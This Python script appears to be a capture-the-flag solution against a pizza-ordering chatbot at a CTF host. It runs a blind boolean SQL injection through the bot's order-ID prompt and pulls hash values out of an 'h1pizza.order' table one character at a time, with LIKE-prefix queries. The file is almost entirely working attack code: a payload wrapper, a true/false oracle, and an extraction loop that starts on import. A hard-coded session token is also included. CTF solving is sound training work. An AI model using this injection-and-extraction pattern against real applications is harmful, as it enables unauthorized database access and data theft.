import requests, json, time | |
# Hard-coded session identifier. getChat() and sendMsg() send it both as the
# "session" Cookie and again as a query-string / form parameter, so it also
# ends up in any request log on the way to the server.
session = "aaa812cc572b27f73a336ccaf85277f9"
def getChat():
    """Fetch the chat log for the current session and return the newest bot message.

    The endpoint is queried with ``lastchat=0``; only the last entry's
    ``message`` field is used, with the ``<div><span class="talk-pizzabot">
    PizzaBot:</span> `` prefix and the closing ``</div>`` stripped so callers
    can match on the plain text.

    Returns:
        str: the latest PizzaBot message with its wrapper markup removed.
    """
    # The session id is sent twice: in the query string and in the Cookie header.
    endpoint = "https://pizza.hacktivity.h1ctf.com/pizzabot?session=%s&lastchat=0" % session
    request_headers = {
        "Cookie": "session=%s" % session,
        "X-Requested-With": "XMLHttpRequest",
    }
    response = requests.get(endpoint, headers=request_headers)
    chat_entries = json.loads(response.text)
    latest = chat_entries[-1]["message"]
    # Strip the bot's wrapper markup so only the spoken text remains.
    prefix = '<div><span class="talk-pizzabot">PizzaBot:</span> '
    latest = latest.replace(prefix, '')
    return latest.replace('</div>', '')
def sendMsg(msg):
    """Post one chat message to PizzaBot and return the raw response body.

    Args:
        msg: text sent as the ``message`` form field.

    Returns:
        str: the POST response body, unparsed.
    """
    endpoint = "https://pizza.hacktivity.h1ctf.com/pizzabot"
    # The session id travels both in the Cookie header and in the form body.
    request_headers = {
        "Cookie": "session=%s" % session,
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
    }
    form_fields = {"session": session, "message": msg}
    response = requests.post(endpoint, headers=request_headers, data=form_fields)
    return response.text
def sendSqli(query):
    """Submit one condition through the bot's order lookup and classify the reply.

    The bot is first sent "Order"; its reply is fetched and a short pause
    follows. If that reply already contains the unknown-order text, "Order" is
    sent once more and ``None`` is returned (callers treat it as false).
    Otherwise ``query`` is wrapped in the fixed ``' or if(ifnull((...),'1'),
    '1','0')='1`` form, sent, and the next bot reply is printed and matched.

    Returns:
        True when the reply contains the unknown-order text, False when it
        says the order is still out for delivery, True (after printing the
        unclassified reply) for anything else, and None in the not-ready
        case described above.
    """
    sendMsg('Order')
    reply = getChat()
    time.sleep(0.5)
    if "Sorry I don't recognise that order ID" in reply:
        # Bot was not at the order prompt: nudge it again and give up on this
        # probe. Explicit None matches the original's implicit fall-through.
        sendMsg('Order')
        return None
    payload = "' or if(ifnull(({}),'1'),'1','0')='1".format(query)
    sendMsg(payload)
    probe_reply = getChat()
    print(probe_reply)
    if "Sorry I don't recognise that order ID" in probe_reply:
        return True
    if "order is still out for delivery" in probe_reply:
        return False
    # Any other reply is surfaced for inspection and counted as a hit.
    print("unknown result: {}".format(probe_reply))
    return True
# Author's scratch notes on what the probes had found so far. This is a bare
# string expression at module level, so it has no effect at runtime.
'''
information_schema
h1pizza
order
delivered
hash
id
id = 1001
hash = aau5....
delivered = 0/1
'''
def getData():
    """Recover a value one character at a time, using sendSqli() as the oracle.

    Each pass tries every character of a fixed lowercase alphanumeric set as
    the next character of ``known``; the first candidate for which sendSqli()
    returns a truthy value is appended, the partial value is printed, and a
    new pass starts. The probed query is fixed inline. The outer loop has no
    exit condition: when no candidate is accepted in a pass, the same pass is
    repeated indefinitely.
    """
    known = ""
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
    while True:
        for candidate in alphabet:
            # Presumably escaped because "_" is a LIKE wildcard; the alphabet
            # above never contains it, so this branch is dormant.
            if candidate == "_":
                candidate = "\\_"
            prefix = known + candidate
            query = (
                "select hash from h1pizza.order where delivered=1 and hash like '"
                + prefix
                + "%' AND hash not in('ul2hamz1') limit 1"
            )
            print(query)
            if sendSqli(query):
                known = prefix
                print(known)
                break
# Module-level call: the extraction loop starts as soon as this file is
# imported or executed (there is no __main__ guard).
getData()